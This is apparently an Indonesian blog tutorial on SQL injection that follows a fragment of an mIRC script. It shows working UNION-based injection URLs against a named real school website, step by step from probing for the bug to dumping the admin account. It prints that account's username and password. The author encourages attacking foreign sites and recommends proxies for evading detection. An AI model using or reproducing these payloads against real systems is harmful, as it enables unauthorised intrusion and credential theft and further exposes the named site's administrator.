/part %tc
/pesan
}
on 1:CHAT:*: /ignore -pntik *!*@

Read the rest of this entry »

tekhnik SQL injection

SQL Injection di PHP tentu berbeda. SQL Injection di PHP biasa disebut dengan Blind SQL (SQL Buta). Disebut Blind, karena kita hanya menebak-nebak tanpa mengetahui informasi apapun dari suatu server PHP.

Yang harus diketahui sebelum sql injection pada php, di depan sama dengan ditambahkan tanda minus (id=-) itu artinya sama dengan 1=2 agar id tersebut bernilai error,dan dibelakang menggunakan /* itu sama artinya –,# menandakan akhir perintah.

Sekarang saya akan memberikan 1 buat contoh web.. (tapi mohon ini web jangan di deface ^_^).

Sebelum kalian belajar blind sql ada baiknya kalian mempelajari cara mencari target nya.. Untuk itu kalian terlebih dahulu harus mengerti dari special syntax yang ada pada Google…
Contoh : allinurl, Intitle, site dll. Baca Disini.

OK lanjut pada tahap selanjutnya…
Sebelumnya saya telah mendapatkan target yaitu :

http://methodist.sch.id/message.php?id=6

Cara mengecek bug pada ini web…
* Tambahkan and 1=0 (bernilai false)
http://methodist.sch.id/message.php?id=6 and 1=0
(artikel web menghilang)
* Tambahkan and 1=1 (bernilai true)
http://methodist.sch.id/message.php?id=6 and 1=1
(artikel web tampil kembali)

dari percobaan tersebut dapat dipastikan bahwa web tersebut mempunyai celah untuk di hack dengan sql.

Kemudian kita akan mencari magic number pada web tersebut agar kita dapat memasukan query sql nya.
* Kita akan gunakan order by 1– (berfungsi untuk mencari finished number)
http://methodist.sch.id/message.php?id=6 order by 1–
http://methodist.sch.id/message.php?id=6 order by 2–
(cari sampai kalian mendapatkan batasan web tersebut error).
Contoh :
http://methodist.sch.id/message.php?id=6 order by 4– (artikel webnya tampil)
http://methodist.sch.id/message.php?id=6 order by 5– (artikel webnya menghilang)
maka secara kesimpulan number finished web tersebut berada pada angka 4.

Mencari Magic Number
* Kalian dapat gunakan tanda Minus pada akhir tanda sama dengan =- dan menambahkan
tanda — sebagai tanda akhir perintah di belakang Url target.
Contoh : http://methodist.sch.id/message.php?id=-… union select 1,2,3,4–

http://www.geocities.com/reshindra_jaya/…

pada gambar di atas tampaklah angka 2,1, dan 4. inilah yang disebut magic number..
Penjelasan: dari angka 1,2,3,4 pada union select hanya angka 1,2,dan 4 yang bisa
kalian gunakan. coba aja gunakan perintah sql..
Contoh : http://methodist.sch.id/message.php?id=-… union select 1,version(),3,4–
maka akan tampil wersi mysql pada web tersebut dan kalian juga bisa menggunakan @@version untuk menggantikan version() karena @@version=version().

Mengeluarkan table name pada Web
* Disini saya akan menggunakan group_concat untuk mengeluarkan tabel secara keseluruhan. Klo pake limit bakalan lama jadinya.
syntax : union select group_concat(table_name) from information_schema.tables where table_schema=database()–
artinya : kita akan mengeluarkan keseluruhan tabel menggunakan information schema dimana table yang dischema adalah dari fungsi query database().
Jadi bisa diartikan database() adalah perintah yang digunakan untuk melihat nama database.
Contoh : http://methodist.sch.id/message.php?id=-… union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()–
atau : http://methodist.sch.id/message.php?id=-… union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=0×6D6574686F6469735F6D6574686F–

http://www.geocities.com/reshindra_jaya/…

Aku jelaskan 2 contoh di atas..
0×6D6574686F6469735F6D6574686F = adalah Hexa string dari Ascii text nya methodis_metho, Kemudian apa dan darimana saya dapatkan kata2 methodis_metho..?
methodis_metho adalah nama database yang ada pada web target tersebut.. Untuk mengecek nya bisa anda tes..
contoh : http://methodist.sch.id/message.php?id=-… union select 1,database(),3,4–

Mengeluarkan column name pada Web
* Untuk mengeluarkan column name syntax nya sama aja dengan mengeluarkan table name, hanya saja kata2 table nya kita ganti dengan column.
syntax : union select group_concat(column_name) from information_schema.columns where table_name=nama_table_target–
artinya : kita akan mengeluarkan keseluruhan column menggunakan information schema dimana table name nya = table yang jadi tujuan
Contoh : saya ingin mengeluarkan column yang ada pada table t_user yang tampil pada web target.
http://methodist.sch.id/message.php?id=-… union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0×745F75736572–

http://www.geocities.com/reshindra_jaya/…

Col_name: f_user,f_name,f_password

Mengeluarkan Field pada column web
* sekarang kita ingin melihat isi dari column name tersebut
Contoh : http://methodist.sch.id/message.php?id=-… union select 1,group_concat(f_user,0×2d2d,f_name,0×2d2d,f_passw ord),3,4 from t_user–

http://www.geocities.com/reshindra_jaya/…

kesimpulan : dari column_name=f_user,f_name,f_password dimana table_name=t_user dan database_name=methodis_metho, maka berhasil kita dapatkan :
user : admin
nama : admin
pass : 159357

^_^

Nb : * http://www.piclist.com/techref/ascii.htm <== untuk mengubah ascii text ke hexa string
* Setiap bilangan hexa harus di tambah 0x
contoh : bilangan hexa dari whiteorblack = 77686974656F72626C61636B
bila di gunakan akan menjadi = 0×77686974656F72626C61636B (untuk info dapat di baca pada http://www.piclist.com/techref/ascii.htm)
* Jangan pernah melakukan deface or pencurian data web pada web indonesia..( klo web luar ngak papa dech..)
* Jika ingin login sebaiknya menggunakan proxy atau tunnel untuk lebih aman.

My opinion : *Ilmu yang baik adalah ilmu yang diajarkan kepada orang lain meski ilmu itu jelek sekalipun*
Heheh….dari nebak2 tuh lah vay…
artinyo kito harus biso nebak table adminyo dibuat dengen namo apo…

Klo sudah dapet table adminnyo tinggal tes be langsung from table admin..
Contoh:
* http://methodist.sch.id/message.php?id=-… union select 1,2,3,4– (anggap sebagai versi 4)
nah tinggal di tambahin nama table_admin nya aja..
Contoh:
* http://methodist.sch.id/message.php?id=-… union select 1,2,3,4 from nama_table–
Klo nama table nya bener maka Magic numbernya akan tetep tampil.. tapi klo salah maka Magic angka nya akan hilang.. buat buktiin kita tes aja langsung..

Final test:
* http://methodist.sch.id/message.php?id=-… union select 1,2,3,4 from user–
(Magic numbernya hilang karena table name nya salah)

* http://methodist.sch.id/message.php?id=-… union select 1,2,3,4 from t_user–
(Magic numbernya tampil berarti table adminnya bener).

Nb : biasanya sebuah admin akan membuat nama table user yang sama setiap dia membuat website 

Read the rest of this entry »